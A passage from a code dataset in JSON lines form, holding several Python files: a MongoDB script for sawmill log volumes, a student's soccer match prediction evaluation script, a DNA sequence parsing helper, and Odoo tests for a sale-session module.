monitoring\n","repo_name":"ulteo/ovd","sub_path":"OvdServer/ovd/SlaveServer.py","file_name":"SlaveServer.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"5911711791","text":"from pymongo import MongoClient\nfrom math import pi, pow\nfrom copy import deepcopy\nfrom json import dumps\nfrom sys import argv as av\nimport re\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client.data\ndoc = db.production\n\npattern = '\\(([\\d, ]+)\\)'\n\n\ndef get_diam(item, diam):\n\tfor t in diam:\n\t\tif t[0] <= item < t[1]:\n\t\t\treturn str(t)\n\treturn 0\n\n\ndef create_res(diams: list, filtre_diam: tuple = None):\n\t\"\"\"\n\n\t:param diams: list of diameters\n\t:param filtre_diam: diameters filter\n\t:return:\n\t\"\"\"\n\tres = {\n\t\t'Cumul': {\n\t\t\t'nb': 0,\n\t\t\t'nb %': 0,\n\t\t\t'vol grume(m3)': 0,\n\t\t\t'vol prod(m3)': 0,\n\t\t\t'%': 0,\n\t\t\t'vol multi(m3)': 0,\n\t\t\t'vol multi(%)': 0,\n\t\t\t'vol delign(m3)': 0,\n\t\t\t'vol delign(%)': 0\n\t\t}\n\t}\n\tif filtre_diam:\n\t\tres[str(filtre_diam)] = deepcopy(res['Cumul'])\n\telse:\n\t\tfor diam in diams:\n\t\t\tres[str(diam)] = deepcopy(res['Cumul'])\n\treturn res\n\n\ndef appro(debut, fin, diams: list = None, filtre_long: int = None, filtre_diam: tuple = None):\n\t\"\"\"\n\t:param debut: debut de la plage de temps a selectionner sous forme de 'yyyy-mm-ddThh:mm:ss'\n\t:param fin: fin de la plage de temps a selectionner sous forme de 'yyyy-mm-ddThh:mm:ss'\n\t:param diam: list de tuple de filtre de diametres\n\t:return: nuting\n\t\"\"\"\n\tquery = doc.find(\n\t\t{'TempsDeCycle.Time': {'$gte': debut, '$lt': fin}},\n\t\t{'MesureGrume': 1, 'InfosSciage': 1, '_id': 0}\n\t)\n\tres = create_res(diams, filtre_diam)\n\tres['Cumul']['nb %'] = 100\n\tnb_total = doc.count_documents({'TempsDeCycle.Time': {'$gte': debut, '$lt': fin}}, {})\n\tif not nb_total:\n\t\tprint({})\n\t\treturn\n\tfor item in query:\n\t\tif filtre_long and filtre_long != item['MesureGrume']['LongueurMarchandeMM']:\n\t\t\tcontinue\n\t\tdiam = get_diam(item['MesureGrume']['DiametreCubageMM'], diams)\n\t\tif diam in res:\n\t\t\tdiam_cub = item['MesureGrume']['DiametreCubageMM'] / 10 / 2\n\t\t\tlong_cub = item['MesureGrume']['LongueurCubageMM'] / 10\n\t\t\tvol = (pi * pow(diam_cub, 2) * long_cub) / 1000000\n\t\t\tres[diam]['vol grume(m3)'], res['Cumul']['vol grume(m3)'] = res[diam]['vol grume(m3)'] + vol, res['Cumul']['vol grume(m3)'] + vol\n\t\t\tres[diam]['nb'], res['Cumul']['nb'] = res[diam]['nb'] + 1, res['Cumul']['nb'] + 1\n\t\t\tfor x in item['InfosSciage']['InfosSciage']:\n\t\t\t\tvol = x['Epaisseur'] * x['Longueur'] * x['Largeur'] * x['NombreProduits'] / 1000000000\n\t\t\t\tif x['NombreProduits'] != 0:\n\t\t\t\t\tif x['Info'] & 1 == 1:\n\t\t\t\t\t\tres[diam]['vol multi(m3)'], res['Cumul']['vol multi(m3)'] = res[diam]['vol multi(m3)'] + vol, res['Cumul']['vol multi(m3)'] + vol\n\t\t\t\t\telse:\n\t\t\t\t\t\tres[diam]['vol delign(m3)'], res['Cumul']['vol delign(m3)'] = res[diam]['vol delign(m3)'] + vol, res['Cumul']['vol delign(m3)'] + vol\n\t\t\t\t\tres[diam]['vol prod(m3)'] += vol\n\t\t\t\t\tres['Cumul']['vol prod(m3)'] += vol\n\tfor item in res:\n\t\tres[item]['nb %'] = round(res[item]['nb'] * 100 / nb_total)\n\t\tres[item]['vol grume(m3)'] = round(res[item]['vol grume(m3)'], 2)\n\t\tres[item]['vol multi(%)'] = round(res[item]['vol multi(%)'], 2)\n\t\tres[item]['vol delign(%)'] = round(res[item]['vol delign(%)'], 2)\n\t\tres[item]['%'] = round(res[item]['vol prod(m3)'] * 100 / res['Cumul']['vol grume(m3)'])\n\t\tres[item]['vol multi(%)'] = round(res[item]['vol multi(m3)'] * 100 / res['Cumul']['vol prod(m3)'])\n\t\tres[item]['vol delign(%)'] = round(res[item]['vol delign(m3)'] * 100 / res['Cumul']['vol prod(m3)'])\n\n\tx = res['Cumul']\n\tres.pop('Cumul')\n\tres['Cumul'] = x\n\tprint(res)\n\n\nif __name__ == '__main__':\n\tn, debut, fin, param, filtre_diam, filtre_long = av\n\tfiltre_long = int(filtre_long)\n\tparam = [int(x) for x in param.split(',')]\n\tparam = [(x, y) for x, y in zip(param[::2], param[1::2])]\n\tfiltre_diam = filtre_diam.split(',')\n\tfiltre_diam = (int(filtre_diam[0]), int(filtre_diam[1]))\n\tif filtre_diam == (0, 0):\n\t\tfiltre_diam = None\n\tif filtre_long == 0:\n\t\tfiltre_long = None\n\tappro(\n\t\tdebut=debut,\n\t\tfin=fin,\n\t\tdiams=param,\n\t\tfiltre_diam=filtre_diam,\n\t\tfiltre_long=filtre_long,\n\t)\n\t# print(param, filtre_diam, filtre_long,sep='\\n')","repo_name":"Inoruuk/API_Finega","sub_path":"static/js/Script/approvisionement.py","file_name":"approvisionement.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28623779760","text":"\"\"\"\r\nAuthor : Nam Tran, Leonardo Lindo, and Kyle Grace\r\nClass : HMC CS 158\r\nDate : 2020 May 12\r\nDescription : Soccer Match Winner Predictions\r\n\r\nThis code is adapted from course material by Jenna Wiens (UMichigan).\r\nDocstrings based on scikit-learn format.\r\n\"\"\"\r\n\r\n# python libraries\r\nimport os\r\nfrom joblib import load\r\n\r\n# data science libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# scikit-learn libraries\r\nfrom sklearn.dummy import DummyClassifier\r\nfrom sklearn.svm import LinearSVC, SVC\r\nfrom sklearn.utils import resample\r\nfrom sklearn.pipeline import Pipeline\r\n\r\n# project-specific helper libraries\r\nimport soccer_config\r\nfrom soccer_practice import score, METRICS\r\nimport classifiers\r\n\r\n\r\n\r\n######################################################################\r\n# globals\r\n######################################################################\r\n\r\nNRECORDS = 3733 # number of match records\r\nFEATURES_TRAIN_FILENAME, LABELS_TRAIN_FILENAME, \\\r\n FEATURES_TEST_FILENAME, LABELS_TEST_FILENAME = \\\r\n soccer_config.get_filenames(nrecords=NRECORDS, test_data=True)\r\n\r\n\r\n\r\n######################################################################\r\n# functions\r\n######################################################################\r\n\r\ndef get_test_scores(clf, X, y, n_bootstraps=1, metrics=['accuracy']) :\r\n \"\"\"\r\n Estimates the performance of the classifier using the 95% CI.\r\n \r\n Parameters\r\n --------------------\r\n clf : estimator object\r\n This is assumed to implement the scikit-learn estimator interface.\r\n The estimator must already be fitted to data.\r\n \r\n X : numpy array of shape (n_samples, n_features)\r\n Feature vectors of test set.\r\n \r\n y : numpy array of shape (n_samples,)\r\n Ground truth labels of test set.\r\n \r\n n_bootstraps : int\r\n Number of bootstrapping iterations.\r\n \r\n metrics : list\r\n Performance metrics.\r\n \r\n Returns\r\n --------------------\r\n scores : dict\r\n Dictionary of (metric, list of score) pairs.\r\n For instance, if n_bootstraps = 3 and metrics = ['accuracy', 'auroc'],\r\n then scores will be represented as a dict of\r\n {\r\n 'accuracy' : 0.81\r\n 'accuracy_boot' : [0.74, 0.70, 0.90]\r\n 'auroc' : 0.81\r\n 'auroc_boot' : [0.60, 0.75, 0.85]\r\n }\r\n \"\"\"\r\n \r\n # make predictions\r\n try :\r\n y_pred = clf.decision_function(X) \r\n except : # for dummy classifiers\r\n y_pred = clf.predict(X)\r\n \r\n # initialize dictionary\r\n scores = {}\r\n \r\n ### ========== TODO : START ========== ###\r\n # part a : find score on full data set\r\n # find bootstrap scores on resampled data set\r\n # professor's solution: 7 lines\r\n #\r\n # hint: use sklearn.utils.resample to sample\r\n # set random_state to the bootstrap iteration\r\n # to generate same sampling across metrics\r\n for m in metrics:\r\n scores[m] = score(y, y_pred, metric = m)\r\n\r\n for i in range(0, n_bootstraps):\r\n X, y = resample(X, y, random_state = i, replace = True) \r\n\r\n for m in metrics:\r\n if scores.get(m + '_boot') is None:\r\n scores[m + '_boot'] = [score(y, y_pred, metric = m)]\r\n else: \r\n scores[m + '_boot'].append(score(y, y_pred, metric = m))\r\n \r\n ### ========== TODO : END ========== ###\r\n \r\n return scores\r\n\r\n\r\ndef plot_results(clf_strs, score_names, scores) :\r\n \"\"\"\r\n Plot results as grouped bar plot,\r\n with metric along x-axis and model as groups.\r\n \r\n You do NOT have to understand the implementation of this function.\r\n \r\n Parameters\r\n ----------\r\n clf_strs : list\r\n List of strings, one per classifier.\r\n \r\n score_names : list\r\n List of scorer names.\r\n \r\n scores : dict\r\n Dictionary of (clf_str, score) pairs.\r\n For instance, if clf_strs == ['Dummy'] and score_names = ['score'],\r\n then scores will be represented as a dict of\r\n { 'Dummy' :\r\n {\r\n 'score' : 0.70\r\n 'lower_score' : 0.00\r\n 'upper_score' : 0.05\r\n }\r\n }\r\n \"\"\"\r\n \r\n # text annotation\r\n def autolabel(rects) :\r\n \"\"\"Attach a text label above each bar displaying its height\"\"\"\r\n for rect in rects:\r\n height = rect.get_height()\r\n ax.annotate(f\"{height:.3f}\", xy=(rect.get_x() + rect.get_width() / 2., height),\r\n xytext=(0, 3), textcoords='offset points', # 3 points vertical offset\r\n ha='center', va='bottom')\r\n \r\n scorers = sorted(score_names)\r\n n_scorers = len(scorers)\r\n ind = np.arange(n_scorers) # x locations for groups\r\n width = 1 / (len(clf_strs) + 1) # width of the bars\r\n \r\n # bar plot with error bars\r\n fig = plt.figure(figsize=[12.8, 9.6])\r\n ax = plt.gca()\r\n for j, clf_str in enumerate(clf_strs) :\r\n results = scores[clf_str]\r\n heights = np.empty((n_scorers),)\r\n errs = np.empty((2, n_scorers))\r\n \r\n for k, scorer in enumerate(scorers) :\r\n height = results[f'{scorer}']\r\n lower = results[f'lower_{scorer}']\r\n upper = results[f'upper_{scorer}']\r\n \r\n heights[k] = height\r\n errs[:,k] = (height - lower, upper - height)\r\n \r\n rects = ax.bar(ind + width * j, heights, width, yerr=errs, label=clf_str)\r\n autolabel(rects)\r\n \r\n # x-axis\r\n ax.set_xticks(ind + width * (len(clf_strs) - 1) / 2.)\r\n ax.set_xticklabels(scorers)\r\n \r\n # title\r\n ax.set_title('Test Performance')\r\n \r\n # y-axis\r\n ax.set_ylabel('score')\r\n ax.set_ylim(0, 1)\r\n \r\n # legend\r\n ax.legend(title='model',\r\n bbox_to_anchor=(1.04,.5), loc='center left')\r\n \r\n fig.tight_layout()\r\n plt.show()\r\n\r\n\r\n\r\n######################################################################\r\n# main\r\n######################################################################\r\n\r\ndef main():\r\n np.random.seed(42)\r\n \r\n #========================================\r\n # read data\r\n \r\n print('Reading data...')\r\n \r\n df_features_test = pd.read_csv(FEATURES_TEST_FILENAME)\r\n X_test = df_features_test.drop('MatchID', axis=1).values\r\n \r\n df_labels_test = pd.read_csv(LABELS_TEST_FILENAME)\r\n y_test = df_labels_test['Outcome'].values\r\n \r\n print()\r\n \r\n #========================================\r\n # evaluate on test data\r\n \r\n print('Evaluating on test data...')\r\n \r\n clf_strs = classifiers.CLASSIFIERS\r\n n_bootstraps = 100\r\n scores = {}\r\n \r\n for clf_str in clf_strs :\r\n # load pipelines from file\r\n # use the pipeline like any regular classifier\r\n # pipelines have already been refit on full training set using best found parameters\r\n # no need to retrain here\r\n filename = os.path.join(soccer_config.PICKLE_DIR, f'{clf_str}_soln.joblib')\r\n pipe = load(filename)\r\n \r\n # compute scores\r\n test_scores = get_test_scores(pipe, X_test, y_test, n_bootstraps, METRICS)\r\n \r\n ### ========== TODO : START ========== ###\r\n # part b : summarize to dictionary\r\n # professor's solution: 6 lines\r\n #\r\n # We will use this dictionary to visualize performance.\r\n # Example: scores_clf_str is a dictionary that looks like\r\n # {\r\n # 'accuracy' : 0.70\r\n # 'lower_accuracy' : 0.00\r\n # 'upper_accuracy' : 0.05\r\n # }\r\n # \r\n # You will have three dict items per score metric.\r\n # \r\n # The first element (e.g. 'accuracy') is the score on the full test set.\r\n # The lower and upper bound are based on the 95% confidence interval.\r\n # That is, lower value (e.g. 'lower_accuracy') corresponds to the 2.5-percentile,\r\n # and upper value (e.g. 'upper_accuracy') corresponds to the 97.5-percentile.\r\n #\r\n # hint: use np.percentile to compute percentiles\r\n scores_clf = {}\r\n \r\n for m in METRICS:\r\n boot = test_scores[m + '_boot']\r\n scores_clf[m] = test_scores[m]\r\n scores_clf['lower_' + m] = np.percentile(boot, 2.5)\r\n scores_clf['upper_' + m] = np.percentile(boot, 97.5) \r\n \r\n ### ========== TODO : END ========== ###\r\n \r\n # save scores for current classifier\r\n scores[clf_str] = scores_clf\r\n \r\n # plot test performance\r\n plot_results(clf_strs, METRICS, scores)\r\n \r\n print()\r\n \r\n #========================================\r\n # feature importances\r\n \r\n print('Evaluating feature importance...')\r\n \r\n clf_str = 'LinearSVM'\r\n filename = os.path.join(soccer_config.PICKLE_DIR, f'{clf_str}_soln.joblib')\r\n pipe = load(filename)\r\n \r\n feature_names = df_features_test.drop('MatchID', axis=1).columns.tolist()\r\n coef = pipe['clf'].coef_[0]\r\n \r\n ### ========== TODO : START ========== ###\r\n # part e : identify important features\r\n # print to screen\r\n # professor's solution: 8 lines\r\n \r\n arr = []\r\n for i in range(0, len(feature_names)):\r\n arr.append([feature_names[i], coef[i]])\r\n arr = sorted(arr, key=lambda x: abs(x[1]))[-5:]\r\n ans = []\r\n for i in reversed(arr):\r\n ans.append(i)\r\n print(ans)\r\n ### ========== TODO : START ========== ###\r\n print()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"leothelindo/CS158-Soccer","sub_path":"source/soccer_insight.py","file_name":"soccer_insight.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41483451253","text":"import re\r\n\r\n\r\n\r\ndef convert_txt_to_pure_seq(string_seqs):\r\n new_string = string_seqs\r\n new_string.strip(\"BBa\")\r\n pattern = r\"[a-z]+\"\r\n pure_seqs = re.findall(pattern, string_seqs)\r\n pure_seq = list(set(pure_seqs))\r\n return pure_seq\r\n\r\n\r\n\r\n\r\ndef positive_seq_list():\r\n f_positive_seq = open('Positive_seqs_with_ref_(101).txt', 'r')\r\n seq_positive = f_positive_seq.read()\r\n list_seq_positive = convert_txt_to_pure_seq(seq_positive)\r\n f_positive_seq.close()\r\n return list_seq_positive\r\n\r\ndef constitutive_seq_list():\r\n f_constitutive_seq = open('Constitutive_seqs_with_ref_(49).txt', 'r')\r\n constitutive_seq = f_constitutive_seq.read()\r\n list_seq_constitutive = convert_txt_to_pure_seq(constitutive_seq)\r\n list_seq_constitutive.remove('a')\r\n f_constitutive_seq.close()\r\n return list_seq_constitutive\r\n\r\ndef Negative_seq_list():\r\n f_Negative_seq = open('Negative_seqs_with_ref(130).txt', 'r')\r\n Negative_seq = f_Negative_seq.read()\r\n list_seq_negative = convert_txt_to_pure_seq(Negative_seq)\r\n list_seq_negative.remove('a')\r\n f_Negative_seq.close()\r\n return list_seq_negative\r\n\r\n# 刚想到,可以用matplotlib查看一下序列长度的大致分布情况,然后考虑下一步\r\n\r\n\"\"\"\r\ndef max_len(list_seq_positive, list_seq_constitutive, list_seq_negative):\r\n max_positive, max_constitutive, max_negative = 0, 0, 0\r\n for i in range(len(list_seq_positive)):\r\n max_positive = max(max_positive, len(list_seq_positive[i]))\r\n for i in range(len(list_seq_constitutive)):\r\n max_constitutive = max(max_constitutive, len(list_seq_constitutive[i]))\r\n for i in range(len(list_seq_negative)):\r\n max_negative = max(max_negative, len(list_seq_negative[i]))\r\n max_len = max(max_constitutive, max_negative, max_positive)\r\n print max_len\r\n\"\"\"","repo_name":"shangjieZou/Promoter-transcriptional-predictor","sub_path":"Vectorizing Sequences.py","file_name":"Vectorizing Sequences.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36071348790","text":"import logging\n\nfrom odoo import fields\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tests.common import TransactionCase\n\n_log = logging.getLogger(__name__)\n\n\nclass TestSaleTeamCashCount(TransactionCase):\n\n def setUp(self):\n super().setUp()\n templates = self.env['account.chart.template'].search([], limit=1)\n if not templates:\n _log.warning(\n 'Test skipped because there is no chart of account defined '\n 'new company')\n self.skipTest('No Chart of account found')\n return\n if not templates.existing_accounting(self.env.user.company_id):\n templates.try_loading_for_current_company()\n self.product = self.env['product.product'].create({\n 'type': 'product',\n 'company_id': False,\n 'name': 'Test product',\n 'standard_price': 10,\n 'list_price': 100,\n })\n self.partner = self.env['res.partner'].create({\n 'name': 'Partner test',\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team = self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n 'require_sale_session': True,\n })\n\n def test_crm_team(self):\n with self.assertRaises(ValidationError):\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': 'a,'\n })\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': '1,'\n })\n self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': False\n })\n team = self.env['crm.team'].create({\n 'name': 'Test Sale Team',\n 'require_sale_session': True,\n 'cash_money_values': '1,2,3,'\n })\n self.assertEquals(round(sum(team.get_cash_money_values()), 2), 6)\n team.cash_money_values = '0.1,0.2,0.3'\n self.assertEquals(round(sum(team.get_cash_money_values()), 2), 0.6)\n\n def test_sale_session(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n self.assertTrue(session.name)\n self.assertIn('SS', session.name)\n self.assertEquals(session.open_date.date(), fields.Date.today())\n self.assertEquals(session.close_date, False)\n self.assertEquals(session.validation_date, False)\n session.action_open()\n self.assertEquals(\n session.get_current_sale_session(self.team.id), session)\n with self.assertRaises(ValidationError):\n self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n with self.assertRaises(ValidationError):\n session.copy()\n\n def test_without_sale_session(self):\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.env.user.write({\n 'groups_id': [(6, 0, [self.env.ref(\n 'sale_session.group_without_sale_session').id])],\n })\n team = self.env['crm.team'].create({\n 'name': 'Without sale session',\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n 'member_ids': [(6, 0, [self.env.user.id])],\n })\n session = self.env['sale.session'].create({\n 'team_id': team.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': team.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertFalse(sale.session_id)\n\n def test_session_with_sales(self):\n with self.assertRaises(UserError):\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': False,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertEquals(sale.session_id, session)\n self.assertEquals(session.balance_end, 0)\n sale.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total)\n self.assertEquals(session.amount_diff, sale.amount_total)\n sale.action_invoice_create()\n sale = sale.copy()\n sale.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total * 2)\n wizard = self.env['sale.session.close'].create({\n 'session_id': session.id,\n })\n wizard.action_confirm()\n self.assertEquals(session.state, 'close')\n self.assertEquals(session.close_date.date(), fields.Date.today())\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n 'balance_start': 100,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n session.action_open()\n sale = sale.copy({'session_id': session.id})\n wizard = self.env['sale.order.payment'].create({\n 'sale_id': sale.id,\n 'journal_id': journal.id,\n 'amount': sale.amount_total,\n })\n wizard.action_confirm()\n self.assertEquals(session.balance_start, 100)\n self.assertEquals(session.balance_end, sale.amount_total + 100)\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(len(sale.invoice_ids), 1)\n self.assertEquals(sale.invoice_ids.state, 'paid')\n with self.assertRaises(UserError):\n wizard.action_confirm()\n session.state = 'close'\n session.action_validate()\n self.assertEquals(session.validation_date.date(), fields.Date.today())\n new_session = session.copy()\n self.assertEquals(new_session.balance_start, session.balance_end)\n\n def test_session_payment(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.assertTrue(journal)\n payment = session.register_payment(self.partner, journal, 100)\n self.assertEquals(payment.state, 'posted')\n self.assertEquals(len(session.payment_ids), 1)\n self.assertEquals(session.balance_start, 0)\n self.assertEquals(session.balance_end, 100)\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n self.assertEquals(len(session.payment_ids), 2)\n self.assertEquals(session.balance_start, 0)\n self.assertEquals(session.balance_end, 150)\n\n def test_session_close(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n bank_journal = self.env['account.journal'].search(\n [('type', '=', 'bank')], limit=1)\n wizard = self.env['sale.order.payment'].create({\n 'sale_id': sale.id,\n 'journal_id': bank_journal.id,\n 'amount': sale.amount_total,\n })\n wizard.action_confirm()\n self.assertEquals(session.balance_end, sale.amount_total)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': cash_journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n wizard = self.env['sale.session.payment'].create({\n 'session_id': session.id,\n 'partner_id': self.partner.id,\n 'journal_id': cash_journal.id,\n 'amount': 50,\n })\n wizard.action_confirm()\n self.assertEquals(\n session.balance_end, sale.amount_total + 100)\n wizard = self.env['sale.session.close'].create({\n 'session_id': session.id,\n })\n wizard.action_confirm()\n self.assertIsNot(session.close_date, False)\n self.assertIs(session.validation_date, False)\n self.assertEquals(len(wizard.journal_line_ids), 2)\n bank_line = wizard.journal_line_ids.filtered(\n lambda l: l.journal_id == bank_journal)\n self.assertEquals(bank_line.amount_total, sale.amount_total)\n session.action_validate()\n self.assertEquals(session.validation_date.date(), fields.Date.today())\n\n def test_session_open_cash_count(self):\n self.team.cash_money_values = (\n '0.01,0.05,0.10,0.20,0.50,1,2,5,10,20,50,100,200,500')\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n wizard = self.env['sale.session.wizard_cash_count'].create({\n 'session_id': session.id,\n 'journal_id': journal.id,\n 'type': 'open',\n })\n self.assertEquals(wizard.team_id, session.team_id)\n self.assertEquals(len(wizard.line_ids), 14)\n line = wizard.line_ids[0]\n line.quantity = 3\n self.assertEquals(wizard.amount_total, line.value * 3)\n wizard.action_confirm()\n self.assertEquals(len(session.open_cash_count_ids), 14)\n self.assertEquals(len(session.close_cash_count_ids), 0)\n self.assertEquals(session.open_cash_count_total, line.value * 3)\n self.assertEquals(session.close_cash_count_total, 0)\n\n def test_session_close_wizard(self):\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n session.register_payment(self.partner, journal, 100)\n wizard_obj = self.env['sale.session.close']\n wizard = wizard_obj.create({\n 'session_id': session.id,\n })\n self.assertEquals(wizard.team_id, session.team_id)\n self.assertEquals(len(wizard.journal_line_ids), 1)\n self.assertEquals(wizard.journal_line_ids.amount_total, 100)\n self.assertEquals(wizard.amount_next_session, wizard.balance_end)\n session.team_id.cash_money_balance_start = 10\n wizard = wizard_obj.with_context(new_env=True).create({\n 'session_id': session.id,\n })\n self.assertEquals(session.team_id.cash_money_balance_start, 10)\n self.assertEquals(wizard.amount_next_session, 10)\n self.assertEquals(wizard.amount_send, 90)\n wizard.action_confirm()\n self.assertEquals(session.close_date.date(), fields.Date.today())\n session.action_validate()\n self.assertEquals(session.validation_date.date(), fields.Date.today())\n\n def test_action_confirm_and_pay(self):\n payment_term = self.env['account.payment.term'].create({\n 'name': 'Test Payment term',\n })\n self.partner.property_payment_term_id = payment_term.id\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.write({\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n sale.session_pay(\n sale.amount_total, sale.team_id.default_payment_journal_id)\n self.assertEquals(sale.picking_ids.state, 'done')\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_ids.state, 'paid')\n self.assertEquals(len(sale.picking_ids), 1)\n invoice = sale.invoice_ids[0]\n self.assertFalse(invoice.payment_term_id)\n self.assertEquals(invoice.payment_ids[0].amount, sale.amount_total)\n\n def test_action_confirm_and_pay_with_wirzard(self):\n payment_term = self.env['account.payment.term'].create({\n 'name': 'Test Payment term',\n })\n self.partner.property_payment_term_id = payment_term.id\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.write({\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'tax_id': [(6, 0, [])],\n 'product_uom_qty': 1}),\n ]\n })\n self.assertEquals(len(sale.order_line[0].tax_id), 0)\n wizard = self.env['sale.order.confirm_and_pay'].create({\n 'sale_id': sale.id,\n 'journal_id': cash_journal.id,\n 'amount': 250,\n })\n self.assertEquals(wizard.amount_total, 100)\n self.assertEquals(wizard.amount, 250)\n self.assertEquals(wizard.amount_change, 150)\n wizard.action_pay()\n invoice = sale.invoice_ids[0]\n self.assertEquals(invoice.payment_ids[0].amount, sale.amount_total)\n\n def test_action_confirm_and_pay_without_stock(self):\n location = self.env.ref('stock.stock_location_stock')\n inventory = self.env['stock.inventory'].create({\n 'name': 'add products for tests',\n 'filter': 'product',\n 'location_id': location.id,\n 'product_id': self.product.id,\n 'exhausted': True,\n })\n inventory.action_start()\n inventory.line_ids.write({\n 'product_qty': 0,\n 'location_id': location.id,\n })\n inventory._action_done()\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.default_payment_journal_id = journal.id\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 100}),\n ]\n })\n sale.session_pay(\n sale.amount_total, sale.team_id.default_payment_journal_id)\n self.assertEquals(sale.picking_ids.state, 'done')\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_ids.state, 'paid')\n self.assertEquals(len(sale.picking_ids), 1)\n","repo_name":"treytux/trey-addons","sub_path":"sale_session/tests/test_sale_team_cash_count.py","file_name":"test_sale_team_cash_count.py","file_ext":"py","file_size_in_byte":17606,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"32198238373","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import genfromtxt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport easygui\nimport sys\n\n'choose depth/heading etc'\nfilename = 